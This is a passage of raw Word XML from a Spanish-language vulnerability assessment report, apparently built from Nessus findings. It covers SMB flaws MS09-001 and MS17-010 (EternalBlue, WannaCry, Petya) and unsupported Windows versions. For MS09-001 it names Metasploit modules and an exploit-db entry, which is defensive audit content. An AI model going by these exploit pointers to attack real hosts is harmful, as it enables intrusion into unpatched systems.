    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="b5cea8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">35362 - MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CVE-2008-4834, CVE-2008-4835, CVE-2008-4114</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El host remoto se ve afectado por una vulnerabilidad de corrupción de memoria en SMB que puede permitir que un atacante ejecute código arbitrario o realice una denegación de servicio contra el host remoto.</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotable con</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Impact Metasploit (Microsoft SRV.SYS WriteAndX Invalid DataOffset)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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vínculos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preser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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.tenable.com/plugins/nessus/35362</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2008-4114</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)</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pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/6463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08.6614173228347" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">73182 - Microsoft Windows XP Unsupported Installation Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El host remoto ejecuta Microsoft Windows XP. El soporte para este sistema operativo por parte de Microsoft finalizó el 8 de abril de 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="708.6614173228347" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La falta de soporte implica que el proveedor no lanzará nuevos parches de seguridad para el producto. Como resultado, es probable que contenga vulnerabilidades de seguridad. Además, es poco probable que Microsoft investigue o reconozca informes de vulnerabilidades.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?2f80aef2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?321523eb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?8dcab5e4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">108797 - Unsupported Windows OS (remote)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="980000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción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6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A la versión remota de Microsoft Windows le falta un paquete de servicio o ya no es compatible. Como resultado, es probable que contenga vulnerabilidades de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff9900"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff9900"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">97833 - MS17-010: Security Update for Microsoft Windows SMB Server (4013389)(ETERNALBLUE)(ETERNALCHAMPION)(ETERNALROMANCE)(ETERNALSYNERGY) (WannaCry) (EternalRocks)(Petya) (uncredentialed check).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff9900"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción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B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El host remoto de Windows se ve afectado por las siguientes vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Existen varias vulnerabilidades de ejecución remota de código en Microsoft Server Message Block 1.0 (SMBv1) debido al manejo inadecuado de ciertas solicitudes. Un atacante remoto no autenticado puede aprovechar estas vulnerabilidades a través de un paquete especialmente diseñado para ejecutar código arbitrario.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Existe una vulnerabilidad de divulgación de información en Microsoft Server Message Block 1.0 (SMBv1) debido al manejo inadecuado de ciertas solicitudes. Un atacante remoto no autenticado puede aprovechar esto, a través de un paquete especialmente diseñado, para revelar información confidencial. (CVE-2017-0147)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE y ETERNALSYNERGY son cuatro de múltiples Vulnerabilidades y exploits de Equation Group revelados el 14/04/2017 por un grupo conocido como Shadow Brokers.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WannaCry / WannaCrypt es un programa de ransomware que utiliza el exploit ETERNALBLUE, y EternalRocks es un gusano que utiliza siete vulnerabilidades de Equation Group. </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Petya es un programa de ransomware que primero utiliza CVE-2017-0199, una vulnerabilidad en Microsoft Office, y luego se propaga a través de ETERNALBLUE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vínculos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?68fc8eff</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?321523eb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?065561d0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.nessus.org/u?d9f569cf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.nessus.org/u?b9d9ebf9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
